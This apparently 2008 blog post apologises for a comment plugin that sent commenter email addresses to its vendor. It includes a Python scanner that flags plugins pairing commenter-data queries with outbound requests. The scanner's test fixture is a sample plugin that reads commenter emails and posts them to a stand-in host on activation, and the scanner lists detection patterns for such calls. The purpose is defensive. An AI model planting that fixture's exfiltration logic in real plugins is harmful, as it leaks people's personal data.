Email addresses mined from Thudfactor

Date April 22, 2008

If you are a commenter here, I owe you an apology. Yesterday I integrated the SezWho comment plugin, which tracks comments and commenter reputation across weblogs. I assumed that only registered SezWho users would be subject to that tracking. That assumption was incorrect.

When I activated the plugin, it transmitted six years' worth of commenter email addresses, unencrypted, back to the SezWho main database so that the SezWho application could begin building a comment dossier keyed on those addresses.

In my programming career there have been several grand Oops moments. There was the time I dumped a month's worth of vitally important submitted document commentary for a major association's big meeting. There was the time I accidentally spammed Capitol Hill. And then there was this moment.

I immediately contacted SezWho's developers, who have spent some time with me explaining how the system works. They have agreed to remove all Thudfactor-related content from their database, and I take them at their word on this. People who mine addresses for nefarious, spammy purposes don't have working email addresses, much less trade email back and forth about application internals. I really think they are just plugin developers trying to solve a tricky problem and provide a valuable service.

They didn’t have to offer to remove the data or even respond to my email message. So I believe they are coding in good faith and aren’t going to go around and sell mailing lists behind my back.

But that’s only my impression, and it would have been much better to not have to rely on the kindness of strangers.

The moral of the story

The moral of the story is different depending on whether you are a site owner or just a commenter. As a site owner, I should have been more careful about installing this plugin. Any activated plugin can read the site's database tables, commenter email addresses included, and phone home with whatever it finds, and WordPress itself gives no warning when one does. In this case it was a plugin that explicitly collected and matched data on commenters, but it could just as easily have been something innocuous-looking such as a "random image" plugin. Indeed, plugins with injected malicious code have started turning up in a number of places, usually someone else's plugin with the hostile code added. The site 5ThirtyOne suggests downloading plugins only from the original author's web site, but that will not protect you if the author is the one injecting the code. In this case the intent was not malicious, but it easily could have been.
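One check a site owner can run before activating anything is a static scan of the plugin directory for the two things that, combined, produced this incident: code that reads commenter data out of the database and code that makes an outbound HTTP request. The script below is an added example, not code from this site, from WordPress, or from SezWho; the two "plugins" it scans are constructed in-line for the demo, and the pattern lists are my own heuristics (WordPress's wp_remote_* HTTP API plus the raw PHP primitives, and the comment_author_email column and $wpdb->comments table that commenter identities live in).

```python
"""Static scan of WordPress plugin sources for the combination described
above: reading commenter data from the database AND sending data off-site.
Added example; the sample plugin sources and pattern lists are constructed
for this demo and are not anything WordPress or SezWho ships."""
import re
import tempfile
from pathlib import Path

# Calls a plugin can use to make an outbound request: WordPress's own HTTP
# API (wp_remote_*) and the raw PHP primitives it wraps.
OUTBOUND_PATTERNS = [
    r"\bwp_remote_(?:post|get|request|head)\s*\(",
    r"\bcurl_init\s*\(",
    r"\bfsockopen\s*\(",
    r"\bfile_get_contents\s*\(\s*['\"]https?://",
]

# Ways a plugin can get at commenter identities: the email column, the
# comments API, the comments table object, or raw SQL against wp_comments.
COMMENTER_DATA_PATTERNS = [
    r"\bcomment_author_email\b",
    r"\bget_comments\s*\(",
    r"\$wpdb->comments\b",
    r"\bFROM\s+\w*_?comments\b",
]


def scan_source(php: str) -> dict:
    """Return which outbound and commenter-data patterns occur in one PHP source."""
    found = {"outbound": [], "commenter_data": []}
    for pat in OUTBOUND_PATTERNS:
        if re.search(pat, php, re.IGNORECASE):
            found["outbound"].append(pat)
    for pat in COMMENTER_DATA_PATTERNS:
        if re.search(pat, php, re.IGNORECASE):
            found["commenter_data"].append(pat)
    return found


def scan_plugin_dir(plugins_root: Path) -> dict:
    """Map each plugin subdirectory (wp-content/plugins/<name>) to merged findings.

    A plugin is flagged only when it both touches commenter data and talks
    out; either alone is normal (a stats plugin phones home, a comment
    plugin reads comments)."""
    report = {}
    for plugin in sorted(p for p in plugins_root.iterdir() if p.is_dir()):
        merged = {"outbound": set(), "commenter_data": set()}
        for php_file in plugin.rglob("*.php"):
            f = scan_source(php_file.read_text(encoding="utf-8", errors="replace"))
            merged["outbound"].update(f["outbound"])
            merged["commenter_data"].update(f["commenter_data"])
        merged["phones_home_with_commenter_data"] = (
            bool(merged["outbound"]) and bool(merged["commenter_data"])
        )
        report[plugin.name] = merged
    return report


# Constructed sample plugins: one harmless, one doing what the post describes.
SAMPLE_PLUGINS = {
    "random-image": '''<?php
/* Plugin Name: Random Image (constructed sample) */
function ri_show() { $imgs = glob(dirname(__FILE__) . "/img/*.jpg"); echo $imgs[array_rand($imgs)]; }
''',
    "comment-dossier": '''<?php
/* Plugin Name: Comment Dossier (constructed sample of the behaviour described) */
function cd_sync() {
    global $wpdb;
    $rows = $wpdb->get_results("SELECT comment_author_email FROM {$wpdb->comments}");
    wp_remote_post("https://example.invalid/collect", array("body" => array("emails" => $rows)));
}
register_activation_hook(__FILE__, "cd_sync");
''',
}


def build_sample_tree(root: Path) -> None:
    """Write the constructed plugins into a fake wp-content/plugins layout."""
    for name, src in SAMPLE_PLUGINS.items():
        d = root / name
        d.mkdir(parents=True, exist_ok=True)
        (d / f"{name}.php").write_text(src, encoding="utf-8")


def demo() -> dict:
    """Scan the constructed tree and return the report (used by the test)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_sample_tree(root)
        return scan_plugin_dir(root)


if __name__ == "__main__":
    # Point scan_plugin_dir at a real wp-content/plugins to audit a live site.
    for name, r in demo().items():
        flag = "FLAG" if r["phones_home_with_commenter_data"] else "ok  "
        print(f"{flag} {name}: outbound={sorted(r['outbound'])} "
              f"commenter_data={sorted(r['commenter_data'])}")
```

This is a heuristic, not proof: obfuscated code (eval of a base64 blob, table names built from $wpdb->prefix . 'comments', requests made from JavaScript served to the browser) slips past it, and a plugin that reads comments and separately reports version statistics will be flagged although it may be fine. Treat a FLAG as "read this one before activating it", and for anything you cannot read, activate it on a staging copy of the site first while watching outbound traffic.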

For commenters, it's a good reminder to keep a disposable public address (or several) for spreading around and a private address for trusted communication. I know many of you already do this. But every site you use your email address on is another chance for that address to be lifted, even years after your last interaction.

And, unfortunately, even here at Thudfactor.

The plugin itself has been disabled, and I want to reiterate that SezWho says they are cleaning their database of the content I inadvertently sent them yesterday. I'm sorry, and I'll do my best to start thinking of my database as a valuable collection of personal data rather than just my hobby.

6 Responses to “Email addresses mined from Thudfactor”

  1. Nick said:

    DAMMIT JOHN! God….

  2. Fred said:

    I haven’t seen a sudden increase in spam, but if I do, I’ll know who’s to blame. ;)

    In all seriousness, I do appreciate your letting us know. My concern isn’t so much this little mistake as it is my own use of Wordpress. I’m not sure I’d even notice malicious code in a plugin when I downloaded it.

  3. IshMEL said:

    There was the time I accidentally spammed Capitol Hill.

    Story! Story!

  4. Jitendra said:

    John,

    Thanks for an interesting conversation and for raising the issues…We did not use the md5 encoding that was used by Gravatar as it is not guaranteed to generate unique keys…But we will investigate other approaches here.

    In addition, I want to reiterate that the users on the board will not be getting any spam emails etc. so there is no cause for concern.

    John, I’ll ping you soon to work through the process of getting rid of the data and to explain how you can verify it.

    Thanks, Jitendra
    SezWho

  5. Nancy Cole said:

    Hi John,

    Sounds like a stressful day! If you’re still interested in adding comments, check out js-kit.com. We don’t track reputation of commenters. You will also find ratings, polls and scores there — all very easy to install.

    Best wishes,

    Nancy Cole
    js-kit.com

  6. some call him..... said:

    Meh. Stuff happens. Yeah, and your story of spamming Capitol Hill was WAY cooler.
